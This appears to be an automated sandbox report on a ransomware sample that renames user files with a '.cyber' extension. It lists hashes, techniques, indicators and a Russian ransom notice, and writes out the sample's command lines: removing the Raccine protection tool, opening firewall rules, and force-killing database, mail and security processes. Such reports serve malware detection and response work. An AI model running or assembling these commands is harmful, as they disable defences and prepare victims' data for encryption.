fedb39ac98c39b688703f1968405d75432d881ff34405d3087a989440735aa8e

General

Target

iE8JUAJp7.bin.exe
Size

385KB
MD5

a9a0fae4766d9f7cafa1560f5f62e46f
SHA1

d582608dc07bd9f771334cdb60626755997dd56c
SHA256

f70966e32d18a1e2ed51ebdcc6b985d8f7613febf0680639076c71ebeab6a350
SHA512

5c2f89a16c5291d509f41bd5f12d18a386892738cfd5fb5cbd2156c52d46f28abde5f199461fe9a8bf3aa3f7e4644fe66c3ad48c3b114b792efdbf421468856b

Score

8^/10

evasion persistence ransomware

Malware Config

Signatures

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Downloads PsExec from SysInternals website 1 IoCs
Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

Processes:

description flow ioc

HTTP URL 32 http://live.sysinternals.com/PsExec.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

description	flow	ioc
HTTP URL	32	http://live.sysinternals.com/PsExec.exe

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\RepairExit.png.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SaveExit.tiff	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\SaveExit.tiff => C:\Users\Admin\Pictures\SaveExit.tiff.cyber	iE8JUAJp7.bin.exe
File opened for modification	C:\Users\Admin\Pictures\SaveExit.tiff.cyber	iE8JUAJp7.bin.exe
File renamed	C:\Users\Admin\Pictures\RepairExit.png => C:\Users\Admin\Pictures\RepairExit.png.cyber	iE8JUAJp7.bin.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
File opened (read-only)	\??\J:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\K:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\M:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\T:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\I:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\O:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\H:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\A:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\G:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Z:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\B:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\W:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\E:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\U:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\P:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\N:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\F:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\L:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\X:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Q:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\R:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\Y:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\S:	iE8JUAJp7.bin.exe
File opened (read-only)	\??\V:	iE8JUAJp7.bin.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

27 icanhazip.com

flow	ioc
27	icanhazip.com

Modifies WinLogon 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Внимание Внимание Внимание!!!"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - cyber@outlookpro.net\r\n\r\nХорошего и продуктивного дня!"	iE8JUAJp7.bin.exe

Drops file in Windows directory 13 IoCs

Processes:

netsh.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\1301087654\4010849688.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2878165772\3312292840.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3623239459\11870838.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1601268389\3068621934.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4183903823\1195458082.pri	netsh.exe
File created	C:\Windows\rescache\_merged\3418783148\4223189797.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4185669309\1880392806.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1974107395\1506172464.pri	netsh.exe
File created	C:\Windows\rescache\_merged\1476457207\263943467.pri	netsh.exe
File created	C:\Windows\rescache\_merged\423379043\2764571712.pri	netsh.exe
File created	C:\Windows\rescache\_merged\81479705\2284120958.pri	netsh.exe
File created	C:\Windows\rescache\_merged\2483382631\1144272743.pri	netsh.exe
File created	C:\Windows\rescache\_merged\4272278488\927794230.pri	netsh.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 58 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
872	taskkill.exe
3000	taskkill.exe
4032	taskkill.exe
2312	taskkill.exe
3820	taskkill.exe
2996	taskkill.exe
3864	taskkill.exe
516	taskkill.exe
3264	taskkill.exe
3656	taskkill.exe
1796	taskkill.exe
2876	taskkill.exe
1696	taskkill.exe
1240	taskkill.exe
3864	taskkill.exe
3660	taskkill.exe
3208	taskkill.exe
1040	taskkill.exe
3448	taskkill.exe
608	taskkill.exe
3520	taskkill.exe
2872	taskkill.exe
2124	taskkill.exe
676	taskkill.exe
1752	taskkill.exe
968	taskkill.exe
2224	taskkill.exe
1680	taskkill.exe
3956	taskkill.exe
3544	taskkill.exe
3780	taskkill.exe
1552	taskkill.exe
3132	taskkill.exe
1160	taskkill.exe
4088	taskkill.exe
3892	taskkill.exe
2404	taskkill.exe
956	taskkill.exe
1436	taskkill.exe
3580	taskkill.exe
1796	taskkill.exe
1332	taskkill.exe
3608	taskkill.exe
3188	taskkill.exe
3688	taskkill.exe
1368	taskkill.exe
3400	taskkill.exe
2420	taskkill.exe
2244	taskkill.exe
1012	taskkill.exe
3320	taskkill.exe
892	taskkill.exe
1056	taskkill.exe
3920	taskkill.exe
3936	taskkill.exe
1136	taskkill.exe
2196	taskkill.exe
2364	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3092 reg.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3680 PING.EXE

pid	process
3092	reg.exe

pid	process
3680	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

iE8JUAJp7.bin.exe

pid	process
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe
2636	iE8JUAJp7.bin.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

Processes:

iE8JUAJp7.bin.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2636	iE8JUAJp7.bin.exe
Token: SeDebugPrivilege	2636	iE8JUAJp7.bin.exe
Token: SeDebugPrivilege	516	taskkill.exe
Token: SeDebugPrivilege	1056	taskkill.exe
Token: SeDebugPrivilege	2244	taskkill.exe
Token: SeDebugPrivilege	1160	taskkill.exe
Token: SeDebugPrivilege	2124	taskkill.exe
Token: SeDebugPrivilege	4032	taskkill.exe
Token: SeDebugPrivilege	3608	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeDebugPrivilege	3264	taskkill.exe
Token: SeDebugPrivilege	3920	taskkill.exe
Token: SeDebugPrivilege	3188	taskkill.exe
Token: SeDebugPrivilege	1240	taskkill.exe
Token: SeDebugPrivilege	3864	taskkill.exe
Token: SeDebugPrivilege	3660	taskkill.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	3936	taskkill.exe
Token: SeDebugPrivilege	3956	taskkill.exe
Token: SeDebugPrivilege	1136	taskkill.exe
Token: SeDebugPrivilege	4088	taskkill.exe
Token: SeDebugPrivilege	3688	taskkill.exe
Token: SeDebugPrivilege	956	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	2312	taskkill.exe
Token: SeDebugPrivilege	968	taskkill.exe
Token: SeDebugPrivilege	3892	taskkill.exe
Token: SeDebugPrivilege	3400	taskkill.exe
Token: SeDebugPrivilege	3448	taskkill.exe
Token: SeDebugPrivilege	1436	taskkill.exe
Token: SeDebugPrivilege	1012	taskkill.exe
Token: SeDebugPrivilege	3820	taskkill.exe
Token: SeDebugPrivilege	3580	taskkill.exe
Token: SeDebugPrivilege	676	taskkill.exe
Token: SeDebugPrivilege	608	taskkill.exe
Token: SeDebugPrivilege	3320	taskkill.exe
Token: SeDebugPrivilege	892	taskkill.exe
Token: SeDebugPrivilege	2224	taskkill.exe
Token: SeDebugPrivilege	1752	taskkill.exe
Token: SeDebugPrivilege	1680	taskkill.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	3656	taskkill.exe
Token: SeDebugPrivilege	2996	taskkill.exe
Token: SeDebugPrivilege	3520	taskkill.exe
Token: SeDebugPrivilege	3208	taskkill.exe
Token: SeDebugPrivilege	872	taskkill.exe
Token: SeDebugPrivilege	2872	taskkill.exe
Token: SeDebugPrivilege	1332	taskkill.exe
Token: SeDebugPrivilege	3780	taskkill.exe
Token: SeDebugPrivilege	2876	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	3132	taskkill.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	3544	taskkill.exe
Token: SeDebugPrivilege	3000	taskkill.exe
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeDebugPrivilege	3864	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	2964	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iE8JUAJp7.bin.exe

pid process

2636 iE8JUAJp7.bin.exe
2636 iE8JUAJp7.bin.exe
Suspicious use of SendNotifyMessage 2 IoCs

Processes:

iE8JUAJp7.bin.exe

pid process

2636 iE8JUAJp7.bin.exe
2636 iE8JUAJp7.bin.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iE8JUAJp7.bin.exe

description	pid	process	target process
PID 2636 wrote to memory of 516	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 516	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 516	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 1988	2636	iE8JUAJp7.bin.exe	reg.exe
PID 2636 wrote to memory of 1988	2636	iE8JUAJp7.bin.exe	reg.exe
PID 2636 wrote to memory of 1988	2636	iE8JUAJp7.bin.exe	reg.exe
PID 2636 wrote to memory of 3092	2636	iE8JUAJp7.bin.exe	reg.exe
PID 2636 wrote to memory of 3092	2636	iE8JUAJp7.bin.exe	reg.exe
PID 2636 wrote to memory of 3092	2636	iE8JUAJp7.bin.exe	reg.exe
PID 2636 wrote to memory of 2224	2636	iE8JUAJp7.bin.exe	schtasks.exe
PID 2636 wrote to memory of 2224	2636	iE8JUAJp7.bin.exe	schtasks.exe
PID 2636 wrote to memory of 2224	2636	iE8JUAJp7.bin.exe	schtasks.exe
PID 2636 wrote to memory of 3488	2636	iE8JUAJp7.bin.exe	netsh.exe
PID 2636 wrote to memory of 3488	2636	iE8JUAJp7.bin.exe	netsh.exe
PID 2636 wrote to memory of 3488	2636	iE8JUAJp7.bin.exe	netsh.exe
PID 2636 wrote to memory of 2280	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 2280	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 2280	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 732	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 732	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 732	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 2888	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 2888	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 2888	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 208	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 208	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 208	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 376	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 376	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 376	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 720	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 720	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 720	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 2440	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 2440	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 2440	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 504	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 504	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 504	2636	iE8JUAJp7.bin.exe	sc.exe
PID 2636 wrote to memory of 1056	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 1056	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 1056	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 2244	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 2244	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 2244	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 1160	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 1160	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 1160	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 4032	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 4032	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 4032	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 2124	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 2124	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 2124	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 3608	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 3608	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 3608	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 1040	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 1040	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 1040	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 3264	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 3264	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 3264	2636	iE8JUAJp7.bin.exe	taskkill.exe
PID 2636 wrote to memory of 3920	2636	iE8JUAJp7.bin.exe	taskkill.exe

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

Processes:

iE8JUAJp7.bin.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1"	iE8JUAJp7.bin.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Внимание Внимание Внимание!!!"	iE8JUAJp7.bin.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "Добрый день. У Вас возникли сложности на работе? \r\nНе стоит переживать, наши IT-специалисты помогут Вам.\r\nДля этого напишите пожалуйста нам на почту.\r\n\r\nНаш email - cyber@outlookpro.net\r\n\r\nХорошего и продуктивного дня!"	iE8JUAJp7.bin.exe

C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe
"C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe"
1⤵
- Modifies extensions of user files
- Enumerates connected drives
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2636

C:\Windows\SysWOW64\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:516

C:\Windows\SysWOW64\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:1988

C:\Windows\SysWOW64\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:3092

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:2224

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
- Drops file in Windows directory
PID:3488

C:\Windows\SysWOW64\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:2280

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:732

C:\Windows\SysWOW64\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:2888

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SSDPSRV start= auto
2⤵
PID:208

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:376

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:720

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:2440

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:504

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2244

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM synctime.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1160

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM Ntrtscan.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4032

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2124

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3608

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqbcoreservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1040

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3264

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM agntsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3920

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM isqlplussvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM firefoxconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1240

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3864

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM steam.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3660

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM onenote.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2404

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM sqlwriter.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3956

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM ocomm.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3936

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM encsvc.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1136

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM infopath.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4088

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tbirdconfig.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3688

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM PccNTMon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM excel.exe /F
2⤵
- Kills process with taskkill
PID:1796

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mbamtray.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2312

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msaccess.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:968

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbeng50.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM CNTAoSMgr.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3400

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM zoolz.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3448

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM outlook.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM thebat64.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" IM thunderbird.exe /F
2⤵
- Kills process with taskkill
PID:2196

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM tmlisten.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3820

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM dbsnmp.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3580

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM wordpad.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM msftesql.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:608

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM xfssvccon.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3320

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM mysqld-opt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:892

C:\Windows\SysWOW64\taskkill.exe
"taskkill.exe" /IM powerpnt.exe /F
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\SysWOW64\netsh.exe
"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
2⤵
PID:3464

